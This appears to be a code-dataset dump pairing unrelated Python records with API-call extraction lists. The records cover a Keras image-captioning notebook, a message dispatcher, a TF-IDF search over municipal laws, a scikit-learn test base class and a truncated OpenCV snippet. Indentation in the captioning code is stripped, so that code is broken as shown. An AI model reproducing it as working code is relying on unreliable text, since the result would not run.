display(HTML("""<a href="http://ethereon.github.io/netscope/#/gist/db945b393d40bfa26006">ResNet50 Architecture</a>"""))
model = ResNet50(include_top=False,weights='imagenet',input_shape=(224,224,3),pooling='avg')
model.summary()
# Note: For more details on ResNet50 architecture you can click on hyperlink given below
# Helper function to process images
def preprocessing(img_path):
im = image.load_img(img_path, target_size=(224,224,3))
im = image.img_to_array(im)
im = np.expand_dims(im, axis=0)
return im
train_data = {}
ctr=0
for ix in x_train:
if ix == "":
continue
if ctr >= 3000:
break
ctr+=1
if ctr%1000==0:
print(ctr)
path = images_path + ix
img = preprocessing(path)
pred = model.predict(img).reshape(2048)
train_data[ix] = pred
train_data['2513260012_03d33305cf.jpg'].shape
# opening train_encoded_images.p file and dumping it's content
with open( "train_encoded_images.p", "wb" ) as pickle_f:
pickle.dump(train_data, pickle_f )
# Loading image and its corresponding caption into a dataframe and then storing values from dataframe into 'ds'
pd_dataset = pd.read_csv("flickr_8k_train_dataset.txt", delimiter='\t')
ds = pd_dataset.values
print(ds.shape)
pd_dataset.head()
# Storing all the captions from ds into a list
sentences = []
for ix in range(ds.shape[0]):
sentences.append(ds[ix, 1])
print(len(sentences))
# First 5 captions stored in sentences
sentences[:5]
# Splitting each captions stored in 'sentences' and storing them in 'words' as list of list
words = [i.split() for i in sentences]
# Creating a list of all unique words
unique = []
for i in words:
unique.extend(i)
unique = list(set(unique))
print(len(unique))
vocab_size = len(unique)
# Vectorization
word_2_indices = {val:index for index, val in enumerate(unique)}
indices_2_word = {index:val for index, val in enumerate(unique)}
word_2_indices['UNK'] = 0
word_2_indices['raining'] = 8253
indices_2_word[0] = 'UNK'
indices_2_word[8253] = 'raining'
print(word_2_indices['<start>'])
print(indices_2_word[4011])
print(word_2_indices['<end>'])
print(indices_2_word[8051])
vocab_size = len(word_2_indices.keys())
print(vocab_size)
max_len = 0
for i in sentences:
i = i.split()
if len(i) > max_len:
max_len = len(i)
print(max_len)
padded_sequences, subsequent_words = [], []
for ix in range(ds.shape[0]):
partial_seqs = []
next_words = []
text = ds[ix, 1].split()
text = [word_2_indices[i] for i in text]
for i in range(1, len(text)):
partial_seqs.append(text[:i])
next_words.append(text[i])
padded_partial_seqs = sequence.pad_sequences(partial_seqs, max_len, padding='post')
next_words_1hot = np.zeros([len(next_words), vocab_size], dtype=np.bool)
#Vectorization
for i,next_word in enumerate(next_words):
next_words_1hot[i, next_word] = 1
padded_sequences.append(padded_partial_seqs)
subsequent_words.append(next_words_1hot)
padded_sequences = np.asarray(padded_sequences)
subsequent_words = np.asarray(subsequent_words)
print(padded_sequences.shape)
print(subsequent_words.shape)
print(padded_sequences[0])
for ix in range(len(padded_sequences[0])):
for iy in range(max_len):
print(indices_2_word[padded_sequences[0][ix][iy]],)
print("\n")
print(len(padded_sequences[0]))
num_of_images = 2000
captions = np.zeros([0, max_len])
next_words = np.zeros([0, vocab_size])
for ix in range(num_of_images):#img_to_padded_seqs.shape[0]):
captions = np.concatenate([captions, padded_sequences[ix]])
next_words = np.concatenate([next_words, subsequent_words[ix]])
np.save("captions.npy", captions)
np.save("next_words.npy", next_words)
print(captions.shape)
print(next_words.shape)
with open('D:\\FBAi\\data\\train_encoded_images.p', 'rb') as f:
encoded_images = pickle.load(f, encoding="bytes")
imgs = []
for ix in range(ds.shape[0]):
if ds[ix, 0].encode() in encoded_images.keys():
# print(ix, encoded_images[ds[ix, 0].encode()])
imgs.append(list(encoded_images[ds[ix, 0].encode()]))
imgs = np.asarray(imgs)
print(imgs.shape)
images = []
for ix in range(num_of_images):
for iy in range(padded_sequences[ix].shape[0]):
images.append(imgs[ix])
images = np.asarray(images)
np.save("images.npy", images)
print(images.shape)
image_names = []
for ix in range(num_of_images):
for iy in range(padded_sequences[ix].shape[0]):
image_names.append(ds[ix, 0])
image_names = np.asarray(image_names)
np.save("image_names.npy", image_names)
print(len(image_names))
#Model
captions = np.load("captions.npy")
next_words = np.load("next_words.npy")
print(captions.shape)
print(next_words.shape)
images = np.load("images.npy")
print(images.shape)
imag = np.load("image_names.npy")
print(imag.shape)
embedding_size = 128
max_len = 40
image_model = Sequential()
image_model.add(Dense(embedding_size, input_shape=(2048,), activation='relu'))
image_model.add(RepeatVector(max_len))
image_model.summary()
language_model = Sequential()
language_model.add(Embedding(input_dim=vocab_size, output_dim=embedding_size, input_length=max_len))
language_model.add(LSTM(256, return_sequences=True))
language_model.add(TimeDistributed(Dense(embedding_size)))
language_model.summary()
conca = Concatenate()([image_model.output, language_model.output])
x = LSTM(128, return_sequences=True)(conca)
x = LSTM(512, return_sequences=False)(x)
x = Dense(vocab_size)(x)
out = Activation('softmax')(x)
model = Model(inputs=[image_model.input, language_model.input], outputs = out)
model.compile(loss='categorical_crossentropy', optimizer='RMSprop', metrics=['accuracy'])
model.summary()
hist = model.fit([images, captions], next_words, batch_size=512, epochs=200)
model.save_weights("model_weights.h5")
#Predictions
def preprocessing(img_path):
im = image.load_img(img_path, target_size=(224,224,3))
im = image.img_to_array(im)
im = np.expand_dims(im, axis=0)
return im
def get_encoding(model, img):
image = preprocessing(img)
pred = model.predict(image).reshape(2048)
return pred
resnet = ResNet50(include_top=False,weights='imagenet',input_shape=(224,224,3),pooling='avg')
img = "D:\\FBAi\\data\\Flickr_Data\\Images\\1453366750_6e8cf601bf.jpg"
test_img = get_encoding(resnet, img)
def predict_captions(image):
start_word = ["<start>"]
while True:
par_caps = [word_2_indices[i] for i in start_word]
par_caps = sequence.pad_sequences([par_caps], maxlen=max_len, padding='post')
preds = model.predict([np.array([image]), np.array(par_caps)])
word_pred = indices_2_word[np.argmax(preds[0])]
start_word.append(word_pred)
if word_pred == "<end>" or len(start_word) > max_len:
break
return ' '.join(start_word[1:-1])
Argmax_Search = predict_captions(test_img)
z = Image(filename=img)
display(z)
print(Argmax_Search)
|
[
"numpy.load",
"pickle.dump",
"numpy.argmax",
"pandas.read_csv",
"keras.preprocessing.sequence.pad_sequences",
"keras.models.Model",
"IPython.core.display.HTML",
"keras.preprocessing.image.img_to_array",
"pickle.load",
"keras.preprocessing.image.load_img",
"numpy.save",
"IPython.core.display.display",
"numpy.asarray",
"keras.layers.Concatenate",
"keras.layers.RepeatVector",
"os.listdir",
"IPython.display.Image",
"numpy.concatenate",
"keras.layers.Activation",
"keras.layers.LSTM",
"numpy.zeros",
"numpy.expand_dims",
"keras.applications.resnet50.ResNet50",
"keras.layers.Dense",
"numpy.array",
"keras.layers.Embedding",
"keras.models.Sequential"
] |
[((564, 605), 'os.listdir', 'os.listdir', (['"""D:\\\\FBAi\\\\data\\\\Flickr_Data"""'], {}), "('D:\\\\FBAi\\\\data\\\\Flickr_Data')\n", (574, 605), False, 'import os\n'), ((1624, 1661), 'IPython.display.Image', 'Image', ([], {'filename': '(images_path + temp[0])'}), '(filename=images_path + temp[0])\n', (1629, 1661), False, 'from IPython.display import Image, display\n'), ((1661, 1671), 'IPython.core.display.display', 'display', (['z'], {}), '(z)\n', (1668, 1671), False, 'from IPython.core.display import display, HTML\n'), ((3323, 3416), 'keras.applications.resnet50.ResNet50', 'ResNet50', ([], {'include_top': '(False)', 'weights': '"""imagenet"""', 'input_shape': '(224, 224, 3)', 'pooling': '"""avg"""'}), "(include_top=False, weights='imagenet', input_shape=(224, 224, 3),\n pooling='avg')\n", (3331, 3416), False, 'from keras.applications.resnet50 import ResNet50\n'), ((4386, 4444), 'pandas.read_csv', 'pd.read_csv', (['"""flickr_8k_train_dataset.txt"""'], {'delimiter': '"""\t"""'}), "('flickr_8k_train_dataset.txt', delimiter='\\t')\n", (4397, 4444), True, 'import pandas as pd\n'), ((6330, 6358), 'numpy.asarray', 'np.asarray', (['padded_sequences'], {}), '(padded_sequences)\n', (6340, 6358), True, 'import numpy as np\n'), ((6379, 6407), 'numpy.asarray', 'np.asarray', (['subsequent_words'], {}), '(subsequent_words)\n', (6389, 6407), True, 'import numpy as np\n'), ((6722, 6744), 'numpy.zeros', 'np.zeros', (['[0, max_len]'], {}), '([0, max_len])\n', (6730, 6744), True, 'import numpy as np\n'), ((6759, 6784), 'numpy.zeros', 'np.zeros', (['[0, vocab_size]'], {}), '([0, vocab_size])\n', (6767, 6784), True, 'import numpy as np\n'), ((6985, 7018), 'numpy.save', 'np.save', (['"""captions.npy"""', 'captions'], {}), "('captions.npy', captions)\n", (6992, 7018), True, 'import numpy as np\n'), ((7020, 7057), 'numpy.save', 'np.save', (['"""next_words.npy"""', 'next_words'], {}), "('next_words.npy', next_words)\n", (7027, 7057), True, 'import numpy as np\n'), ((7465, 7481), 'numpy.asarray', 'np.asarray', (['imgs'], {}), '(imgs)\n', (7475, 7481), True, 'import numpy as np\n'), ((7655, 7673), 'numpy.asarray', 'np.asarray', (['images'], {}), '(images)\n', (7665, 7673), True, 'import numpy as np\n'), ((7677, 7706), 'numpy.save', 'np.save', (['"""images.npy"""', 'images'], {}), "('images.npy', images)\n", (7684, 7706), True, 'import numpy as np\n'), ((7902, 7925), 'numpy.asarray', 'np.asarray', (['image_names'], {}), '(image_names)\n', (7912, 7925), True, 'import numpy as np\n'), ((7929, 7968), 'numpy.save', 'np.save', (['"""image_names.npy"""', 'image_names'], {}), "('image_names.npy', image_names)\n", (7936, 7968), True, 'import numpy as np\n'), ((8020, 8043), 'numpy.load', 'np.load', (['"""captions.npy"""'], {}), "('captions.npy')\n", (8027, 8043), True, 'import numpy as np\n'), ((8058, 8083), 'numpy.load', 'np.load', (['"""next_words.npy"""'], {}), "('next_words.npy')\n", (8065, 8083), True, 'import numpy as np\n'), ((8144, 8165), 'numpy.load', 'np.load', (['"""images.npy"""'], {}), "('images.npy')\n", (8151, 8165), True, 'import numpy as np\n'), ((8197, 8223), 'numpy.load', 'np.load', (['"""image_names.npy"""'], {}), "('image_names.npy')\n", (8204, 8223), True, 'import numpy as np\n'), ((8304, 8316), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (8314, 8316), False, 'from keras.models import Sequential, Model\n'), ((8486, 8498), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (8496, 8498), False, 'from keras.models import Sequential, Model\n'), ((8967, 9035), 'keras.models.Model', 'Model', ([], {'inputs': '[image_model.input, language_model.input]', 'outputs': 'out'}), '(inputs=[image_model.input, language_model.input], outputs=out)\n', (8972, 9035), False, 'from keras.models import Sequential, Model\n'), ((9600, 9693), 'keras.applications.resnet50.ResNet50', 'ResNet50', ([], {'include_top': '(False)', 'weights': '"""imagenet"""', 'input_shape': '(224, 224, 3)', 'pooling': '"""avg"""'}), "(include_top=False, weights='imagenet', input_shape=(224, 224, 3),\n pooling='avg')\n", (9608, 9693), False, 'from keras.applications.resnet50 import ResNet50\n'), ((10392, 10411), 'IPython.display.Image', 'Image', ([], {'filename': 'img'}), '(filename=img)\n', (10397, 10411), False, 'from IPython.display import Image, display\n'), ((10413, 10423), 'IPython.core.display.display', 'display', (['z'], {}), '(z)\n', (10420, 10423), False, 'from IPython.core.display import display, HTML\n'), ((3202, 3318), 'IPython.core.display.HTML', 'HTML', (['"""<a href="http://ethereon.github.io/netscope/#/gist/db945b393d40bfa26006">ResNet50 Architecture</a>"""'], {}), '(\n \'<a href="http://ethereon.github.io/netscope/#/gist/db945b393d40bfa26006">ResNet50 Architecture</a>\'\n )\n', (3206, 3318), False, 'from IPython.core.display import display, HTML\n'), ((3594, 3645), 'keras.preprocessing.image.load_img', 'image.load_img', (['img_path'], {'target_size': '(224, 224, 3)'}), '(img_path, target_size=(224, 224, 3))\n', (3608, 3645), False, 'from keras.preprocessing import image, sequence\n'), ((3654, 3676), 'keras.preprocessing.image.img_to_array', 'image.img_to_array', (['im'], {}), '(im)\n', (3672, 3676), False, 'from keras.preprocessing import image, sequence\n'), ((3687, 3713), 'numpy.expand_dims', 'np.expand_dims', (['im'], {'axis': '(0)'}), '(im, axis=0)\n', (3701, 3713), True, 'import numpy as np\n'), ((4216, 4249), 'pickle.dump', 'pickle.dump', (['train_data', 'pickle_f'], {}), '(train_data, pickle_f)\n', (4227, 4249), False, 'import pickle\n'), ((5940, 6001), 'keras.preprocessing.sequence.pad_sequences', 'sequence.pad_sequences', (['partial_seqs', 'max_len'], {'padding': '"""post"""'}), "(partial_seqs, max_len, padding='post')\n", (5962, 6001), False, 'from keras.preprocessing import image, sequence\n'), ((6864, 6912), 'numpy.concatenate', 'np.concatenate', (['[captions, padded_sequences[ix]]'], {}), '([captions, padded_sequences[ix]])\n', (6878, 6912), True, 'import numpy as np\n'), ((6931, 6981), 'numpy.concatenate', 'np.concatenate', (['[next_words, subsequent_words[ix]]'], {}), '([next_words, subsequent_words[ix]])\n', (6945, 6981), True, 'import numpy as np\n'), ((7199, 7231), 'pickle.load', 'pickle.load', (['f'], {'encoding': '"""bytes"""'}), "(f, encoding='bytes')\n", (7210, 7231), False, 'import pickle\n'), ((8336, 8397), 'keras.layers.Dense', 'Dense', (['embedding_size'], {'input_shape': '(2048,)', 'activation': '"""relu"""'}), "(embedding_size, input_shape=(2048,), activation='relu')\n", (8341, 8397), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8416, 8437), 'keras.layers.RepeatVector', 'RepeatVector', (['max_len'], {}), '(max_len)\n', (8428, 8437), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8521, 8606), 'keras.layers.Embedding', 'Embedding', ([], {'input_dim': 'vocab_size', 'output_dim': 'embedding_size', 'input_length': 'max_len'}), '(input_dim=vocab_size, output_dim=embedding_size, input_length=max_len\n )\n', (8530, 8606), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8623, 8655), 'keras.layers.LSTM', 'LSTM', (['(256)'], {'return_sequences': '(True)'}), '(256, return_sequences=True)\n', (8627, 8655), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8754, 8767), 'keras.layers.Concatenate', 'Concatenate', ([], {}), '()\n', (8765, 8767), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8818, 8850), 'keras.layers.LSTM', 'LSTM', (['(128)'], {'return_sequences': '(True)'}), '(128, return_sequences=True)\n', (8822, 8850), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8863, 8896), 'keras.layers.LSTM', 'LSTM', (['(512)'], {'return_sequences': '(False)'}), '(512, return_sequences=False)\n', (8867, 8896), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8905, 8922), 'keras.layers.Dense', 'Dense', (['vocab_size'], {}), '(vocab_size)\n', (8910, 8922), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8933, 8954), 'keras.layers.Activation', 'Activation', (['"""softmax"""'], {}), "('softmax')\n", (8943, 8954), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((9324, 9375), 'keras.preprocessing.image.load_img', 'image.load_img', (['img_path'], {'target_size': '(224, 224, 3)'}), '(img_path, target_size=(224, 224, 3))\n', (9338, 9375), False, 'from keras.preprocessing import image, sequence\n'), ((9384, 9406), 'keras.preprocessing.image.img_to_array', 'image.img_to_array', (['im'], {}), '(im)\n', (9402, 9406), False, 'from keras.preprocessing import image, sequence\n'), ((9417, 9443), 'numpy.expand_dims', 'np.expand_dims', (['im'], {'axis': '(0)'}), '(im, axis=0)\n', (9431, 9443), True, 'import numpy as np\n'), ((8693, 8714), 'keras.layers.Dense', 'Dense', (['embedding_size'], {}), '(embedding_size)\n', (8698, 8714), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((9960, 10026), 'keras.preprocessing.sequence.pad_sequences', 'sequence.pad_sequences', (['[par_caps]'], {'maxlen': 'max_len', 'padding': '"""post"""'}), "([par_caps], maxlen=max_len, padding='post')\n", (9982, 10026), False, 'from keras.preprocessing import image, sequence\n'), ((10135, 10154), 'numpy.argmax', 'np.argmax', (['preds[0]'], {}), '(preds[0])\n', (10144, 10154), True, 'import numpy as np\n'), ((10059, 10076), 'numpy.array', 'np.array', (['[image]'], {}), '([image])\n', (10067, 10076), True, 'import numpy as np\n'), ((10078, 10096), 'numpy.array', 'np.array', (['par_caps'], {}), '(par_caps)\n', (10086, 10096), True, 'import numpy as np\n')]
|
'''
File: message_dispatcher.py
Description: Message dispatch handler
Date: 29/09/2017
Author: <NAME> <<EMAIL>>
'''
from structures import Message, MessagePacket, MessageQueue
class MessageDispatcher(object):
"""Handle the dispatch of the message from the bolt server
Registers new messages for the dispatch handling based on the subscribed
topics.
"""
def __init__(self, socket_server):
"""Initialize the MessageDispatcher
Keyword Arguments:
socket_server -- A socket server object to help with the message dispatch
"""
#The general purpose message register looks like
# message_register = {message_name: [topics]}
self.message_register = {}
#Socket server
self.socket_server = socket_server
#Message structure store
self.message_store = Message()
#Initialize the Message Queue
self.message_queue = MessageQueue()
#Register a message handler with Socket server
self.socket_server.register_handler(self.__generic_handler)
def message_exists(self, message_name):
"""Check if the message exists or not
Keyword arguments:
message_name -- The name of the message
Returns:
Bool
"""
try:
self.message_store.get_message(message_name)
except KeyError:
return False
return True
def register_handler(self, handler):
"""Register a new message handler with the socket server
Keyword arguments:
handler -- Message handling object
"""
self.socket_server.register_handler(handler)
def register_message(self, message_name, message_structure, message_topics):
"""Register a new message
Keyword arguments:
message_name -- The name of the message
message_strcuture -- The name of the structure
message_topics -- The topics to which the message should be broadcasted
Returns: Bool
"""
try:
self.message_store.add_message(message_name, message_structure)
except RuntimeError:
return False
self.message_register[message_name] = message_topics
return True
def unregister_message(self, message_name):
"""Unregister a provided message
Keyword arguments:
message_name -- The name of the message to be removed
"""
if message_name in self.message_register.keys():
self.message_store.remove_message(message_name)
del self.message_register[message_name]
def send_message(self, message_name, params={}):
"""Send a new message
Keyword arguments:
message_name -- The name of the message to be sent
params -- The parameters to be added to the message
Raises:
KeyError if the params provided do not match message structure
RuntimeError if the message sending fails
Returns:
Integer
"""
message_structure = self.__get_message_structure(message_name)
for key in params.keys():
if key not in message_structure.keys():
raise KeyError("Parameter mismatch in message structure and provided params")
else:
message_structure[key] = params[key]
message_packet = MessagePacket(message_structure)
try:
for topic in self.message_register[message_name]:
mid, packet = message_packet.get_packet()
self.socket_server.send_message(topic, packet)
self.message_queue.queue(mid)
return mid
except RuntimeError:
raise RuntimeError("Unable to send the message across the topics")
pass
def __get_message_structure(self, message_name):
"""Get the message structure
Keyword arguments:
message_name -- The name of the message whose structure needs to be
retrieved
Returns:
Mixed The message structure
"""
return self.message_store.get_message(message_name)
def __generic_handler(self, message):
"""Generic message handler
Handles the incoming messages on a generic basis by printing them and
marking the message as completed.
Keyword arguments:
message -- The incoming message object
"""
mid = message['id']
result = message['result']
self.message_queue.update_status(mid, 'Completed')
|
[
"structures.MessageQueue",
"structures.MessagePacket",
"structures.Message"
] |
[((854, 863), 'structures.Message', 'Message', ([], {}), '()\n', (861, 863), False, 'from structures import Message, MessagePacket, MessageQueue\n'), ((932, 946), 'structures.MessageQueue', 'MessageQueue', ([], {}), '()\n', (944, 946), False, 'from structures import Message, MessagePacket, MessageQueue\n'), ((3397, 3429), 'structures.MessagePacket', 'MessagePacket', (['message_structure'], {}), '(message_structure)\n', (3410, 3429), False, 'from structures import Message, MessagePacket, MessageQueue\n')]
|
#!/usr/bin/env python
# coding: utf-8
# # Buscador
#
# Esse notebook implementa um buscador simples.
# A representação pra cada texto é criada a partir da TF-IDF.
# A representação da query (consulta, ou termos buscados)
# é construída a partir do vocabulário dos textos.
# O ranqueamento dos resultados é feito de acordo com
# a semelhança cosseno da query pros textos.
#
# Há várias oportunidades de melhoria.
# Algumas delas são discutidas ao longo do notebook.
#
# Os resultados, mesmo deste buscador ingênuo,
# são bastante satisfatórios.
# O buscador é capaz de retornar leis (neste caso)
# relacionadas à localidades ou personalidades.
# No entanto, o mesmo mecanismo pode ser utilizado
# pra quaisquer outros textos, por exemplo o Diário Oficial.
# Alguns exemplos de buscas são:
#
# "winterianus" - retorna a Lei Municipal sobre citronelas;
#
# "E<NAME>" - retorna Lei Municipal que concede título de cidadão feirense;
#
# "Rua Espassonavel" - retorna Lei Municipal que cita a rua.
# In[ ]:
import numpy as np
import pandas as pd
from scripts.nlp import remove_portuguese_stopwords
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics.pairwise import cosine_similarity
# In[ ]:
laws = pd.read_json("leis.json")
laws.drop(["documento"], inplace=True, axis=1)
print(laws.info())
print(laws.nunique())
# In[ ]:
laws
# In[ ]:
print(laws.loc[len(laws) - 1, "texto"])
# # Buscas por texto
#
# No notebook _similar_laws_ vimos que TF-IDF encontra Leis bastante similares entre si.
# Será que conseguimos também encontrar leis similares a uma query?
#
# Primeiro, devemos construir a representação das leis com TF-IDF.
# Após termos as representações,
# limpamos o texto da consulta utilizando o mesmo método de limpeza das leis.
# Depois, criar uma representação da consulta utilizando o IDF do modelo treinado.
# Finalmente, calcular a similaridade desta consulta
# para todas as leis na base e retornar as mais próximas.
# In[ ]:
laws["texto_limpo"] = laws["texto"].apply(remove_portuguese_stopwords)
# In[ ]:
vectorizer = CountVectorizer()
X = vectorizer.fit_transform(laws["texto_limpo"])
X
# In[ ]:
transformer = TfidfTransformer()
X_tfidf = transformer.fit_transform(X)
X_tfidf
# In[ ]:
query = ["rua espassonavel"]
query[0] = remove_portuguese_stopwords(query[0])
query = vectorizer.transform(query)
query = transformer.transform(query)
# In[ ]:
best_matches = cosine_similarity(query, X_tfidf)
best_matches_idx = np.argsort(best_matches)
for i in range(1, 5):
idx = best_matches_idx[0, -i]
print(laws.loc[idx, "texto"])
print("\n---Next Result:---\n")
# Tcharam! Feito um buscador simples!
#
# Existem limitações.
# A sequência e composição das palavras é uma delas, por exemplo.
# Não adianta buscar pelo nome - sobrenome de uma pessoa.
# Ele vai retornar resultados onde
# algum destes termos sejam mais frequentes.
# Não existe as aspas do Google pra dizer
# "busque por este termo todo junto".
#
# Por exemplo, se eu buscar Elydio,
# o primeiro resultado é a Lei conferindo
# cidadania à Elydio <NAME>.
# Perfeito.
# Mas se eu buscar <NAME>,
# o primeiro resultado sequer tem Azevedo,
# mas o nome Lopes aparece mais de uma vez.
#
# Uma das formas de contornar essa dificuldade é
# usar bigramas ou n-gramas maiores.
#
# ## Outras opções
# ### Indexar
# Há outras formas de indexar os documentos
# e de recuperar, também simples.
# Uma outra forma de indexar, por exemplo,
# é fazer um vetor pra cada palavra
# contando as palavras vizinhas.
# E depois, o vetor do documento seria
# a soma dos vetores das palavras.
# É uma forma interessante porque
# pode gerar visualizações interessantes
# entre a similaridade das palavras.
# Por exemplo, no corpus das Leis Municipais,
# a quais palavras EDUCAÇÃO mais se assemelha?
# Ou SAÚDE? Etc.
#
# Outra forma é contar n-gramas - por exemplo,
# bi-gramas: duas palavras juntas formando um token.
# Dessa forma, você possui uma matriz maior
# e de certa forma uma relação entre a sequencialidade das palavras,
# que pode ser útil pra nomes de pessoas e bairros,
# como citado acima.
#
# ### Recuperar
# Outra forma de recuperar é por
# _local sensitive hashing_.
# Divide em vários planos múltiplas vezes
# e retorna os resultados que estão na mesma região da query.
# No entanto,
# o corpus não é grande o suficiente pra precisar essa estratégia,
# que é mais pra grandes corpora.
# O método acima
# (calcular a simlaridade cosseno e retornar os maiores valores)
# é rápido o suficiente pra parecer instantâneo.
# Talvez com uma demanda mais alta pelo servidor
# venha a necessidade de aumentar a velocidade da busca,
# porém por enquanto não é o caso.
#
# Há ainda um [novo método]
# (https://ai.googleblog.com/2020/07/announcing-scann-efficient-vector.html)
# e uma lib pra isso,
# lançada pelo Google recentemente,
# no dia 28 de Julho de 2020.
#
# ### Avaliação
# Com múltiplas formas de indexar e recuperar vem o dilema:
# como avaliar se uma é melhor que a outra?
# Repetir o processo acima pra todas as opções?
# Isto é, mostrar N melhores resultados e comparar manualmente?
# Ou colocar labels em algumas leis?
# Ex: essa lei trata disso, com tais entidades.
# Checar formas de avaliação.
# Se tivesse em produção,
# poderiamos avaliar por _click through rate_ (CTR) por ex,
# mas não é o caso
|
[
"sklearn.feature_extraction.text.CountVectorizer",
"sklearn.metrics.pairwise.cosine_similarity",
"pandas.read_json",
"numpy.argsort",
"scripts.nlp.remove_portuguese_stopwords",
"sklearn.feature_extraction.text.TfidfTransformer"
] |
[((1247, 1272), 'pandas.read_json', 'pd.read_json', (['"""leis.json"""'], {}), "('leis.json')\n", (1259, 1272), True, 'import pandas as pd\n'), ((2097, 2114), 'sklearn.feature_extraction.text.CountVectorizer', 'CountVectorizer', ([], {}), '()\n', (2112, 2114), False, 'from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n'), ((2194, 2212), 'sklearn.feature_extraction.text.TfidfTransformer', 'TfidfTransformer', ([], {}), '()\n', (2210, 2212), False, 'from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n'), ((2314, 2351), 'scripts.nlp.remove_portuguese_stopwords', 'remove_portuguese_stopwords', (['query[0]'], {}), '(query[0])\n', (2341, 2351), False, 'from scripts.nlp import remove_portuguese_stopwords\n'), ((2453, 2486), 'sklearn.metrics.pairwise.cosine_similarity', 'cosine_similarity', (['query', 'X_tfidf'], {}), '(query, X_tfidf)\n', (2470, 2486), False, 'from sklearn.metrics.pairwise import cosine_similarity\n'), ((2506, 2530), 'numpy.argsort', 'np.argsort', (['best_matches'], {}), '(best_matches)\n', (2516, 2530), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
import os
import numpy as np
import subprocess as subp
from sklearn.datasets import load_iris
from sklearn.datasets import load_breast_cancer
from sklearn.datasets import load_digits
from sklearn.utils import shuffle
from tests.utils.Timer import Timer
from tests.estimator.classifier.SeparatedData import SeparatedData
class Classifier(Timer, SeparatedData):
N_RANDOM_FEATURE_SETS = 30
N_EXISTING_FEATURE_SETS = 30
def setUp(self):
np.random.seed(5)
self._init_env()
self._start_test()
def tearDown(self):
self._clear_estimator()
self._stop_test()
def _init_env(self):
for param in ['N_RANDOM_FEATURE_SETS', 'N_EXISTING_FEATURE_SETS']:
n = os.environ.get(param, None)
if n is not None and str(n).strip().isdigit():
n = int(n)
if n > 0:
self.__setattr__(param, n)
def load_binary_data(self, shuffled=True):
samples = load_breast_cancer()
self.X = shuffle(samples.data) if shuffled else samples.data
self.y = shuffle(samples.target) if shuffled else samples.target
self.n_features = len(self.X[0])
def load_iris_data(self, shuffled=True):
samples = load_iris()
self.X = shuffle(samples.data) if shuffled else samples.data
self.y = shuffle(samples.target) if shuffled else samples.target
self.n_features = len(self.X[0])
def load_digits_data(self, shuffled=True):
samples = load_digits()
self.X = shuffle(samples.data) if shuffled else samples.data
self.y = shuffle(samples.target) if shuffled else samples.target
self.n_features = len(self.X[0])
def _clear_estimator(self):
self.estimator = None
cmd = 'rm -rf tmp'.split()
subp.call(cmd)
|
[
"sklearn.datasets.load_iris",
"sklearn.datasets.load_digits",
"numpy.random.seed",
"sklearn.datasets.load_breast_cancer",
"os.environ.get",
"subprocess.call",
"sklearn.utils.shuffle"
] |
[((484, 501), 'numpy.random.seed', 'np.random.seed', (['(5)'], {}), '(5)\n', (498, 501), True, 'import numpy as np\n'), ((1007, 1027), 'sklearn.datasets.load_breast_cancer', 'load_breast_cancer', ([], {}), '()\n', (1025, 1027), False, 'from sklearn.datasets import load_breast_cancer\n'), ((1275, 1286), 'sklearn.datasets.load_iris', 'load_iris', ([], {}), '()\n', (1284, 1286), False, 'from sklearn.datasets import load_iris\n'), ((1536, 1549), 'sklearn.datasets.load_digits', 'load_digits', ([], {}), '()\n', (1547, 1549), False, 'from sklearn.datasets import load_digits\n'), ((1839, 1853), 'subprocess.call', 'subp.call', (['cmd'], {}), '(cmd)\n', (1848, 1853), True, 'import subprocess as subp\n'), ((754, 781), 'os.environ.get', 'os.environ.get', (['param', 'None'], {}), '(param, None)\n', (768, 781), False, 'import os\n'), ((1045, 1066), 'sklearn.utils.shuffle', 'shuffle', (['samples.data'], {}), '(samples.data)\n', (1052, 1066), False, 'from sklearn.utils import shuffle\n'), ((1114, 1137), 'sklearn.utils.shuffle', 'shuffle', (['samples.target'], {}), '(samples.target)\n', (1121, 1137), False, 'from sklearn.utils import shuffle\n'), ((1304, 1325), 'sklearn.utils.shuffle', 'shuffle', (['samples.data'], {}), '(samples.data)\n', (1311, 1325), False, 'from sklearn.utils import shuffle\n'), ((1373, 1396), 'sklearn.utils.shuffle', 'shuffle', (['samples.target'], {}), '(samples.target)\n', (1380, 1396), False, 'from sklearn.utils import shuffle\n'), ((1567, 1588), 'sklearn.utils.shuffle', 'shuffle', (['samples.data'], {}), '(samples.data)\n', (1574, 1588), False, 'from sklearn.utils import shuffle\n'), ((1636, 1659), 'sklearn.utils.shuffle', 'shuffle', (['samples.target'], {}), '(samples.target)\n', (1643, 1659), False, 'from sklearn.utils import shuffle\n')]
|
import cv2 as cv
capture = cv.VideoCapture('opencv_practicas/VID_20200312_162550.mp4')
while True:
